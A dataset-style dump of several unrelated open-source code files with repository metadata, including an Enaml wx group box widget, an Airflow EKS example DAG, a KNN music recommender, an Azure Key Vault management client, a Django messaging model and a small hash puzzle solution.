align = self._title_alignment
text_width, _ = self._label_size
width, _ = self.GetSizeTuple()
# These offsets are determined empirically to look similar
# in form to Qt on Windows
if align == wx.ALIGN_LEFT:
x = 0 if flat else 8
label.Move((x, 0))
elif align == wx.ALIGN_RIGHT:
right = width
right -= 0 if flat else 8
x = right - text_width
label.Move((x, 0))
elif align == wx.ALIGN_CENTER:
label.CenterOnParent(dir=wx.HORIZONTAL)
else:
raise ValueError('Invalid title alignment %s' % align)
class WxGroupBox(WxContainer, ProxyGroupBox):
""" A Wx implementation of an Enaml ProxyGroupBox.
"""
#: A reference to the widget created by the proxy.
widget = Typed(wxGroupBox)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Creates the underlying QGroupBox control.
"""
self.widget = wxGroupBox(self.parent_widget())
def init_widget(self):
""" Initialize the underlying widget.
"""
super(WxGroupBox, self).init_widget()
d = self.declaration
self.set_title(d.title, cm_update=False)
self.set_flat(d.flat)
self.set_title_align(d.title_align)
#--------------------------------------------------------------------------
# Layout Handling
#--------------------------------------------------------------------------
@staticmethod
def margins_func(widget):
""" Get the current contents margins for the group box.
"""
return widget.GetContentsMargins()
#--------------------------------------------------------------------------
# ProxyGroupBox API
#--------------------------------------------------------------------------
def set_title(self, title, cm_update=True):
""" Update the title of the group box.
"""
if not cm_update:
self.widget.SetTitle(title)
return
widget = self.widget
old_margins = widget.GetContentsMargins()
widget.SetTitle(title)
new_margins = widget.GetContentsMargins()
if old_margins != new_margins:
self.margins_updated()
def set_flat(self, flat):
""" Updates the flattened appearance of the group box.
"""
self.widget.SetFlat(flat)
def set_title_align(self, align):
""" Updates the alignment of the title of the group box.
"""
wx_align = WX_ALIGNMENTS[align]
self.widget.SetAlignment(wx_align)
| [
"sccolbert@gmail.com"
] | sccolbert@gmail.com |
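A side note on the record above: `SetTitle`/`GetTitle` rely on a small padding hack (wrap the label in spaces, then strip one character from each end on read-back). That round-trip can be sketched without wx at all — the function names below are illustrative, not part of the widget API:

```python
def pad_title(title):
    # Mirrors wxGroupBox.SetTitle: one space of padding on each side,
    # applied only to non-empty titles.
    return ' %s ' % title if title else title

def unpad_title(stored):
    # Mirrors wxGroupBox.GetTitle: undo the padding hack.
    return stored[1:-1] if stored else stored

assert pad_title('Options') == ' Options '
assert unpad_title(pad_title('Options')) == 'Options'
assert unpad_title(pad_title('')) == ''
```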
f43b483dfeb3751246fc8febb721f04195a9a24a | 7137161629a1003583744cc3bd0e5d3498e0a924 | /airflow/providers/amazon/aws/example_dags/example_eks_using_defaults.py | 12a80fb4e6e270cea1e79d99caefb113099997a8 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | jbampton/airflow | 3fca85975854eb916f16143b659a9119af143963 | dcfa14d60dade3fdefa001d10013466fe4d77f0d | refs/heads/master | 2023-05-25T22:31:49.104069 | 2021-09-18T19:18:32 | 2021-09-18T19:18:32 | 247,645,744 | 3 | 0 | Apache-2.0 | 2020-03-16T08:12:58 | 2020-03-16T08:12:57 | null | UTF-8 | Python | false | false | 3,917 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from os import environ
from airflow.models.dag import DAG
from airflow.providers.amazon.aws.hooks.eks import ClusterStates, NodegroupStates
from airflow.providers.amazon.aws.operators.eks import (
EKSCreateClusterOperator,
EKSDeleteClusterOperator,
EKSPodOperator,
)
from airflow.providers.amazon.aws.sensors.eks import EKSClusterStateSensor, EKSNodegroupStateSensor
from airflow.utils.dates import days_ago
CLUSTER_NAME = 'eks-demo'
NODEGROUP_SUFFIX = '-nodegroup'
NODEGROUP_NAME = CLUSTER_NAME + NODEGROUP_SUFFIX
ROLE_ARN = environ.get('EKS_DEMO_ROLE_ARN', 'arn:aws:iam::123456789012:role/role_name')
SUBNETS = environ.get('EKS_DEMO_SUBNETS', 'subnet-12345ab subnet-67890cd').split(' ')
VPC_CONFIG = {
'subnetIds': SUBNETS,
'endpointPublicAccess': True,
'endpointPrivateAccess': False,
}
with DAG(
dag_id='example_eks_using_defaults_dag',
schedule_interval=None,
start_date=days_ago(2),
max_active_runs=1,
tags=['example'],
) as dag:
# [START howto_operator_eks_create_cluster_with_nodegroup]
# Create an Amazon EKS cluster control plane and an EKS nodegroup compute platform in one step.
create_cluster_and_nodegroup = EKSCreateClusterOperator(
task_id='create_eks_cluster_and_nodegroup',
cluster_name=CLUSTER_NAME,
nodegroup_name=NODEGROUP_NAME,
cluster_role_arn=ROLE_ARN,
nodegroup_role_arn=ROLE_ARN,
# Opting to use the same ARN for the cluster and the nodegroup here,
# but a different ARN could be configured and passed if desired.
resources_vpc_config=VPC_CONFIG,
        # Compute defaults to 'nodegroup' but is called out here for the purposes of the example.
compute='nodegroup',
)
# [END howto_operator_eks_create_cluster_with_nodegroup]
await_create_nodegroup = EKSNodegroupStateSensor(
task_id='wait_for_create_nodegroup',
cluster_name=CLUSTER_NAME,
nodegroup_name=NODEGROUP_NAME,
target_state=NodegroupStates.ACTIVE,
)
start_pod = EKSPodOperator(
task_id="run_pod",
pod_name="run_pod",
cluster_name=CLUSTER_NAME,
image="amazon/aws-cli:latest",
cmds=["sh", "-c", "ls"],
labels={"demo": "hello_world"},
get_logs=True,
# Delete the pod when it reaches its final state, or the execution is interrupted.
is_delete_operator_pod=True,
)
# [START howto_operator_eks_force_delete_cluster]
# An Amazon EKS cluster can not be deleted with attached resources.
# Setting the `force` to `True` will delete any attached resources before deleting the cluster.
delete_all = EKSDeleteClusterOperator(
task_id='delete_nodegroup_and_cluster', cluster_name=CLUSTER_NAME, force_delete_compute=True
)
# [END howto_operator_eks_force_delete_cluster]
await_delete_cluster = EKSClusterStateSensor(
task_id='wait_for_delete_cluster',
cluster_name=CLUSTER_NAME,
target_state=ClusterStates.NONEXISTENT,
)
create_cluster_and_nodegroup >> await_create_nodegroup >> start_pod >> delete_all >> await_delete_cluster
| [
"noreply@github.com"
] | jbampton.noreply@github.com |
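The DAG above wires its tasks with `>>`, which Airflow implements through `__rshift__` on operators. A minimal, Airflow-free sketch of that chaining mechanic (the `Task` class here is hypothetical, purely for illustration):

```python
class Task:
    """Tiny stand-in for an Airflow operator: `a >> b` records a dependency."""

    def __init__(self, task_id):
        self.task_id = task_id
        self.downstream = []

    def __rshift__(self, other):
        # `self >> other` means "other runs after self".
        self.downstream.append(other)
        return other  # returning `other` is what lets a >> b >> c chain

create = Task('create_eks_cluster_and_nodegroup')
wait = Task('wait_for_create_nodegroup')
pod = Task('run_pod')
create >> wait >> pod

assert create.downstream == [wait]
assert wait.downstream == [pod]
```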
81f504ac97ca0003faf28ebe4384c00b0c873734 | adc1dea2a624af5a3d0564083d521942db77e5cf | /knn_cb_popularity_single.py | 3cfaf45ca93d5b4e167325cc09b7adac20e18674 | [] | no_license | Hadryan/Music_recommender-2 | 7052ac999daf039b2c269ce30a19cf57a5bde3e4 | a92ec61eef679b5b848fa2199ff613412db43c0d | refs/heads/main | 2023-04-24T01:11:57.877872 | 2021-05-25T17:47:28 | 2021-05-25T17:47:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,589 | py | # -*- coding: utf-8 -*-
"""
KNN Content-Based Recommendation
"""
# data science imports
import numpy as np
import pandas as pd
from sklearn.neighbors import NearestNeighbors
import sklearn.preprocessing as skpp
# Scale and normalize data
def scale_norm(data_numerical):
# Remove row if there's NA values and convert to numpy array
data_knn = data_numerical.dropna(axis = 0, how = 'any')
data_knn = np.asarray(data_knn)
# scale data
data_knn = skpp.scale(data_knn, axis = 0)
# normalize data
stdA = np.std(data_knn,axis = 0)
stdA = skpp.normalize(stdA.reshape(1,-1)) # the normalize is different from MATLAB's
data_knn_scale = data_knn @ np.diag(np.ones(stdA.shape[1])/stdA[0])
# extract attributes from raw data
m,n = data_knn_scale.shape
# print('size of the data:',m,n)
return data_knn_scale
# Knn Recommendation
def knn_rank(model_knn, seed_track, data_id, data_knn_scale, num_neighbor):
distances, indices = model_knn.kneighbors(seed_track, n_neighbors = num_neighbor + 1)
# get list of raw idx of recommendations
raw_recommends = data_id.iloc[indices[0][1:],]
result = raw_recommends
return result, distances, indices
def split_numerical_id(track_data):
# Extract the numerical features only, for KNN analysis
data_numerical = track_data[['acousticness','danceability','energy','instrumentalness','key','liveness','loudness','mode','speechiness','tempo','valence','time_signature']]
# Extract the identidy data only, for outputs
data_id = track_data[['album_name','album_uri','artist_name','artist_uri','track_name','track_uri']]
return data_numerical, data_id
def get_knn_recommend(model_knn, seed_id, data_id, data_knn_scale, num_neighbor):
# Predict using KNN
seed_num = data_id[data_id.track_uri == seed_id].index[0]
seed_vector = data_knn_scale[seed_num].reshape(1, -1)
# Predict recommendation using KNN
result, distance, indices = knn_rank(model_knn, seed_vector, data_id, data_knn_scale, num_neighbor)
return result, distance
def knn_run(seed_id, num_neighbor):
# Read Data and drop duplicated track_uris
total_data = pd.read_csv('data_sample.csv').drop_duplicates('track_uri').reset_index(drop = True)
# split the input data into numerical features and identity features
data_numerical, data_id = split_numerical_id(total_data)
# scale and normalize the data
data_knn_scale = scale_norm(data_numerical)
data_id = data_id.reset_index(drop = True)
# print(data_knn_scale.shape)
# print(data_id.shape)
print('Input Seed:', data_id[data_id['track_uri']==seed_id][['artist_name', 'track_name']])
# Model Training
model_knn = NearestNeighbors(metric='cosine', algorithm='brute', n_neighbors=num_neighbor, n_jobs=-1)
model_knn.fit(data_knn_scale)
# Model Predicting
result, distance = get_knn_recommend(model_knn, seed_id, data_id, data_knn_scale, num_neighbor)
result = result.reset_index(drop=True)
score = pd.DataFrame(1 - distance).T[1:].reset_index(drop=True)
output = pd.concat([result, score], axis =1).rename(columns={0:'score'})
return output
if __name__ == '__main__':
# Sample seed track_uri
seed_id = '6dr6QeqH62tYUiPezRbinq'
# Specify the number of neighbors for output
num_neighbor = 100
output = knn_run(seed_id, num_neighbor)
| [
"noreply@github.com"
] | Hadryan.noreply@github.com |
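For intuition about the module above: `NearestNeighbors(metric='cosine', algorithm='brute')` effectively ranks every candidate by cosine distance to the seed vector. A dependency-free sketch of that ranking (not the scikit-learn implementation, just the idea):

```python
import math

def cosine_distance(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return 1.0 - dot / (norm_a * norm_b)

def nearest(seed, candidates, k):
    # Indices of the k candidates closest to the seed, best first.
    ranked = sorted(range(len(candidates)),
                    key=lambda i: cosine_distance(seed, candidates[i]))
    return ranked[:k]

tracks = [(1.0, 0.0), (0.9, 0.1), (0.0, 1.0)]
assert nearest((1.0, 0.0), tracks, 2) == [0, 1]
```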
251fb0fe7b9ce2897c4ea970c74c6afc7d9ca55a | f4434c85e3814b6347f8f8099c081ed4af5678a5 | /sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/aio/_key_vault_management_client.py | a967aa9463c857d292acf0bcdbc7f3d4774fa1e4 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | yunhaoling/azure-sdk-for-python | 5da12a174a37672ac6ed8e3c1f863cb77010a506 | c4eb0ca1aadb76ad892114230473034830116362 | refs/heads/master | 2022-06-11T01:17:39.636461 | 2020-12-08T17:42:08 | 2020-12-08T17:42:08 | 177,675,796 | 1 | 0 | MIT | 2020-03-31T20:35:17 | 2019-03-25T22:43:40 | Python | UTF-8 | Python | false | false | 11,175 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Serializer, Deserializer
from azure.profiles import KnownProfiles, ProfileDefinition
from azure.profiles.multiapiclient import MultiApiClientMixin
from ._configuration import KeyVaultManagementClientConfiguration
class _SDKClient(object):
def __init__(self, *args, **kwargs):
"""This is a fake class to support current implemetation of MultiApiClientMixin."
Will be removed in final version of multiapi azure-core based client
"""
pass
class KeyVaultManagementClient(MultiApiClientMixin, _SDKClient):
"""The Azure management API provides a RESTful set of web services that interact with Azure Key Vault.
    This client contains multiple API versions, to help you deal with all of the Azure clouds
(Azure Stack, Azure Government, Azure China, etc.).
By default, it uses the latest API version available on public Azure.
For production, you should stick to a particular api-version and/or profile.
The profile sets a mapping between an operation group and its API version.
The api-version parameter sets the default API version if the operation
group is not described in the profile.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Subscription credentials which uniquely identify Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
:param str api_version: API version to use if no profile is provided, or if
missing in profile.
:param str base_url: Service URL
:param profile: A profile definition, from KnownProfiles to dict.
:type profile: azure.profiles.KnownProfiles
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
DEFAULT_API_VERSION = '2019-09-01'
_PROFILE_TAG = "azure.mgmt.keyvault.KeyVaultManagementClient"
LATEST_PROFILE = ProfileDefinition({
_PROFILE_TAG: {
None: DEFAULT_API_VERSION,
}},
_PROFILE_TAG + " latest"
)
def __init__(
self,
credential, # type: "AsyncTokenCredential"
subscription_id, # type: str
api_version=None,
base_url=None,
profile=KnownProfiles.default,
**kwargs # type: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = KeyVaultManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
super(KeyVaultManagementClient, self).__init__(
api_version=api_version,
profile=profile
)
@classmethod
def _models_dict(cls, api_version):
return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)}
@classmethod
def models(cls, api_version=DEFAULT_API_VERSION):
"""Module depends on the API version:
* 2016-10-01: :mod:`v2016_10_01.models<azure.mgmt.keyvault.v2016_10_01.models>`
* 2018-02-14: :mod:`v2018_02_14.models<azure.mgmt.keyvault.v2018_02_14.models>`
* 2019-09-01: :mod:`v2019_09_01.models<azure.mgmt.keyvault.v2019_09_01.models>`
* 2020-04-01-preview: :mod:`v2020_04_01_preview.models<azure.mgmt.keyvault.v2020_04_01_preview.models>`
"""
if api_version == '2016-10-01':
from ..v2016_10_01 import models
return models
elif api_version == '2018-02-14':
from ..v2018_02_14 import models
return models
elif api_version == '2019-09-01':
from ..v2019_09_01 import models
return models
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview import models
return models
raise ValueError("API version {} is not available".format(api_version))
@property
def managed_hsms(self):
"""Instance depends on the API version:
* 2020-04-01-preview: :class:`ManagedHsmsOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.ManagedHsmsOperations>`
"""
api_version = self._get_api_version('managed_hsms')
if api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import ManagedHsmsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'managed_hsms'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def operations(self):
"""Instance depends on the API version:
* 2016-10-01: :class:`Operations<azure.mgmt.keyvault.v2016_10_01.aio.operations.Operations>`
* 2018-02-14: :class:`Operations<azure.mgmt.keyvault.v2018_02_14.aio.operations.Operations>`
* 2019-09-01: :class:`Operations<azure.mgmt.keyvault.v2019_09_01.aio.operations.Operations>`
* 2020-04-01-preview: :class:`Operations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.Operations>`
"""
api_version = self._get_api_version('operations')
if api_version == '2016-10-01':
from ..v2016_10_01.aio.operations import Operations as OperationClass
elif api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import Operations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import Operations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import Operations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'operations'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_endpoint_connections(self):
"""Instance depends on the API version:
* 2018-02-14: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.keyvault.v2018_02_14.aio.operations.PrivateEndpointConnectionsOperations>`
* 2019-09-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.keyvault.v2019_09_01.aio.operations.PrivateEndpointConnectionsOperations>`
* 2020-04-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.PrivateEndpointConnectionsOperations>`
"""
api_version = self._get_api_version('private_endpoint_connections')
if api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_endpoint_connections'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def private_link_resources(self):
"""Instance depends on the API version:
* 2018-02-14: :class:`PrivateLinkResourcesOperations<azure.mgmt.keyvault.v2018_02_14.aio.operations.PrivateLinkResourcesOperations>`
* 2019-09-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.keyvault.v2019_09_01.aio.operations.PrivateLinkResourcesOperations>`
* 2020-04-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.PrivateLinkResourcesOperations>`
"""
api_version = self._get_api_version('private_link_resources')
if api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import PrivateLinkResourcesOperations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'private_link_resources'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
@property
def vaults(self):
"""Instance depends on the API version:
* 2016-10-01: :class:`VaultsOperations<azure.mgmt.keyvault.v2016_10_01.aio.operations.VaultsOperations>`
* 2018-02-14: :class:`VaultsOperations<azure.mgmt.keyvault.v2018_02_14.aio.operations.VaultsOperations>`
* 2019-09-01: :class:`VaultsOperations<azure.mgmt.keyvault.v2019_09_01.aio.operations.VaultsOperations>`
* 2020-04-01-preview: :class:`VaultsOperations<azure.mgmt.keyvault.v2020_04_01_preview.aio.operations.VaultsOperations>`
"""
api_version = self._get_api_version('vaults')
if api_version == '2016-10-01':
from ..v2016_10_01.aio.operations import VaultsOperations as OperationClass
elif api_version == '2018-02-14':
from ..v2018_02_14.aio.operations import VaultsOperations as OperationClass
elif api_version == '2019-09-01':
from ..v2019_09_01.aio.operations import VaultsOperations as OperationClass
elif api_version == '2020-04-01-preview':
from ..v2020_04_01_preview.aio.operations import VaultsOperations as OperationClass
else:
raise ValueError("API version {} does not have operation group 'vaults'".format(api_version))
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))
async def close(self):
await self._client.close()
async def __aenter__(self):
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details):
await self._client.__aexit__(*exc_details)
| [
"noreply@github.com"
] | yunhaoling.noreply@github.com |
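Every operation-group property in the client above follows one dispatch pattern: map the configured API version to a module, and raise `ValueError` for anything unknown. A stripped-down sketch of that pattern (the classes here are placeholders, not the real SDK operation classes):

```python
class VaultsOperations2016:
    api_version = '2016-10-01'

class VaultsOperations2019:
    api_version = '2019-09-01'

_VAULTS_BY_VERSION = {
    '2016-10-01': VaultsOperations2016,
    '2019-09-01': VaultsOperations2019,
}

def vaults_operation_class(api_version):
    # Mirrors the if/elif/else-raise ladder used by each property.
    try:
        return _VAULTS_BY_VERSION[api_version]
    except KeyError:
        raise ValueError(
            "API version {} does not have operation group 'vaults'".format(api_version))

assert vaults_operation_class('2019-09-01') is VaultsOperations2019
```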
5d53f9a863c1badebd9528387de602d7b9308982 | 633944f913050debf0764c2a29cf3e88f912670e | /v8/depot_tools/bootstrap-3.8.0b1.chromium.1_bin/python3/lib/python3.8/site-packages/pip/_vendor/packaging/_structures.py | a442ded53a74bb7ab3cfba52fff2e34073d3ae1c | [
"BSD-3-Clause",
"bzip2-1.0.6",
"SunPro",
"Apache-2.0"
] | permissive | bopopescu/V8-lgtm | 0474c2ff39baf754f556ef57619ceae93e7320fd | da307e2f7abfca5fa0e860a809de6cd07fd1b72b | refs/heads/master | 2022-02-16T19:10:54.008520 | 2019-09-25T07:51:13 | 2019-09-25T07:51:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | ../../../../../../../.cipd/pkgs/2/_current/lib/python3.8/site-packages/pip/_vendor/packaging/_structures.py | [
"jundong.xjd@antfin.com"
] | jundong.xjd@antfin.com |
49eba96374a4a38078f28ee469f2bb8d525d67ea | 14e7058adf766352a0b90b66b7dcf887105a481c | /portal/messages/models.py | c11765e46bf0cd904a86461b20cf043a9c9591c9 | [
"BSD-2-Clause"
] | permissive | brunogamacatao/portalsaladeaula | 2b7f07f07c2518dd359f043483fbb27417f62aaf | 9429e485aa37ffea3208339a807032e9230a3c84 | refs/heads/master | 2020-12-29T01:42:18.594281 | 2012-06-22T12:24:44 | 2012-06-22T12:24:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,882 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
__author__ = 'brunocatao'
import datetime
import logging
from django.db import models
from django.contrib.contenttypes import generic
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext as _
from django.contrib.auth.models import User
from django.template import Context
from django.template.loader import get_template
from django.core.mail import EmailMultiAlternatives
from portal.models import UserInfo
class MessageManager(models.Manager):
def for_model(self, model):
"""
QuerySet for all updates for a particular model (either an instance or a class).
"""
ct = ContentType.objects.get_for_model(model)
qs = self.get_query_set().filter(content_type=ct)
if isinstance(model, models.Model):
qs = qs.filter(object_pk=force_unicode(model._get_pk_val()))
return qs
def get_replies(self, user):
qs = self.get_query_set().filter(author=user, is_reply=False)
messages = [msg for msg in list(qs.all()) if msg.replies.count() > 0]
return sorted(messages, key=attrgetter('earlier_date'), reverse=True)
class Message(models.Model):
subject = models.CharField(blank=False, max_length=100)
text = models.TextField(blank=False)
date_published = models.DateTimeField(default=datetime.datetime.now)
author = models.ForeignKey(User, blank=False)
is_reply = models.NullBooleanField(blank=True, null=True)
content_type = models.ForeignKey(ContentType, verbose_name=_('content type'), related_name="content_type_set_for_%(class)s")
object_pk = models.CharField(_('object ID'), max_length=100)
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
objects = MessageManager()
def get_earlier_date(self):
earlier_date = self.date_published
if self.replies:
for reply in self.replies.all():
if reply.child.date_published > earlier_date:
earlier_date = reply.child.date_published
return earlier_date
earlier_date = property(get_earlier_date)
def fill_date_published(sender, instance, **kw):
if not instance.date_published:
instance.date_published = datetime.datetime.now()
models.signals.pre_save.connect(fill_date_published, sender=Message)
def invalidate_cache(sender, instance, **kw):
target = instance.content_type.get_object_for_this_type(pk=instance.object_pk)
target.messages_cache = None
target.save()
models.signals.pre_save.connect(invalidate_cache, sender=Message)
class ReplyRelationship(models.Model):
parent = models.ForeignKey(Message, related_name="replies")
child = models.ForeignKey(Message, related_name="parent")
#Signal processing
import traceback
from portal.messages.signals import massage_was_posted
def message_notification(sender, **kwargs):
message = kwargs['message']
target = message.content_type.get_object_for_this_type(pk=message.object_pk)
text = u'%s postou, %s:' % (message.author.get_profile().name, message.subject, )
text += '\n%s' % message.text
ctx = {
'mensagem': text,
'link': 'http://www.portalsaladeaula.com%s' % target.get_absolute_url(),
}
subject = message.subject
from_email = 'Portal Sala de Aula <gerencia@portalsaladeaula.com>'
text_content = get_template('emails/update.txt').render(Context(ctx))
html_content = get_template('emails/update.html').render(Context(ctx))
    if isinstance(target, UserInfo):
        msg = EmailMultiAlternatives(subject, text_content, from_email, [target.email, ])
        msg.attach_alternative(html_content, "text/html")
        msg.send()
else:
if target.get_students():
for student in target.get_students():
msg = EmailMultiAlternatives(subject, text_content, from_email, [student.email, ])
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except:
                    logging.error('Could not send the email')
traceback.print_exc()
if target.get_teachers():
for teacher in target.get_teachers():
msg = EmailMultiAlternatives(subject, text_content, from_email, [teacher.email, ])
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except:
                    logging.error('Could not send the email')
traceback.print_exc()
massage_was_posted.connect(message_notification)
class Attachment(models.Model):
file = models.FileField(_('Attachment'), blank=False, upload_to='uploads/%Y/%m/%d/%H/%M/%S/')
message = models.ForeignKey(Message, blank=True, null=True) | [
"brunogamacatao@gmail.com"
] | brunogamacatao@gmail.com |
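One subtlety in the record above: despite its name, `Message.get_earlier_date` returns the *most recent* timestamp among a message and its replies (which is why `get_replies` can sort threads by latest activity). The same reduction, Django-free — the function name here is descriptive, not from the source:

```python
from datetime import datetime

def latest_activity(published, reply_dates):
    # Mirrors Message.get_earlier_date: keep the most recent of the
    # message's own date and all of its replies' dates.
    latest = published
    for d in reply_dates:
        if d > latest:
            latest = d
    return latest

base = datetime(2012, 6, 1)
replies = [datetime(2012, 6, 5), datetime(2012, 6, 3)]
assert latest_activity(base, replies) == datetime(2012, 6, 5)
assert latest_activity(base, []) == base
```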
0ef8d8053b594333cebb10fcf5499c6eaa0f4561 | 3a1a9e085da569c8cfd01752a46d499d407f55b7 | /phonesite/manage.py | 1db558fe9844c8bad39ef4149384fbc0e7b74710 | [] | no_license | gzgdouru/django | 9286f2480be029a37f1ca8c8b400c21f7250e64b | e55ea1a3e424da7621ec799759a6d5b346a95bb0 | refs/heads/master | 2020-03-19T13:48:49.830094 | 2018-08-29T01:51:41 | 2018-08-29T01:51:41 | 136,596,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "phonesite.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"18719091650@163.com"
] | 18719091650@163.com |
e38cc17d71bc92be9695f5c69c0a8dd781ea878d | 4ed3db861ae2fe727c7be604d42d540a00923320 | /samsung_multiroom/__init__.py | f5eaa8a8e92a00784ea09bf85a26da5fad2d46e8 | [
"MIT"
] | permissive | kusma/samsung_multiroom | 7cac147283a52bf491d7f50a6569c64de53eb4a5 | 09ca86d27b87a4aa0c97ec2accbd4ec67dd0cc61 | refs/heads/master | 2020-12-04T07:46:19.688568 | 2019-04-20T16:29:44 | 2019-04-20T16:29:44 | 231,683,383 | 0 | 0 | MIT | 2020-01-03T23:47:29 | 2020-01-03T23:47:28 | null | UTF-8 | Python | false | false | 254 | py | """
Init.
"""
# pylint: disable=C0103
from . import factory
from . import discovery
from .service import REPEAT_ONE, REPEAT_ALL, REPEAT_OFF
# aliases
SamsungMultiroomSpeaker = factory.speaker_factory
SamsungSpeakerDiscovery = discovery.SpeakerDiscovery
| [
"k.galutowski@gmail.com"
] | k.galutowski@gmail.com |
1952570b90f1800528a3b78b0f70da2e1c2b2478 | a8be4698c0a43edc3622837fbe2a98e92680f48a | /Programmers/Hash/위장.py | 7916695309725c283e78994ea36da5b2f1786f25 | [] | no_license | blueboy1593/algorithm | fa8064241f7738a12b33544413c299e7c1e1a908 | 9d6fdd82b711ba16ad613edcc041cbecadd85e2d | refs/heads/master | 2021-06-23T22:44:06.120932 | 2021-02-21T10:44:16 | 2021-02-21T10:44:16 | 199,543,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | from collections import defaultdict
def solution(clothes):
answer = 1
clothes_dict = defaultdict(list)
for cloth in clothes:
a, b = cloth
clothes_dict[b].append(a)
arr = []
for value in clothes_dict.values():
arr.append(len(value))
for ar in arr:
answer *= ar + 1
answer -= 1
return answer
solution([['yellow_hat', 'headgear'], ['blue_sunglasses', 'eyewear'], ['green_turban', 'headgear']]) | [
"snb0303@naver.com"
] | snb0303@naver.com |
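The hash-counting trick in the 위장 solution above (multiply each category's item count plus one, then subtract the all-skip case) can be sketched as a standalone function; `outfit_combinations` and its sample data are illustrative names, not part of the original file:

```python
from collections import Counter

def outfit_combinations(clothes):
    # Each category offers (item_count + 1) choices: one of its items,
    # or skipping the category entirely. Multiplying these and subtracting
    # 1 removes the single combination where every category is skipped.
    counts = Counter(category for _, category in clothes)
    total = 1
    for n in counts.values():
        total *= n + 1
    return total - 1

print(outfit_combinations([
    ["yellow_hat", "headgear"],
    ["blue_sunglasses", "eyewear"],
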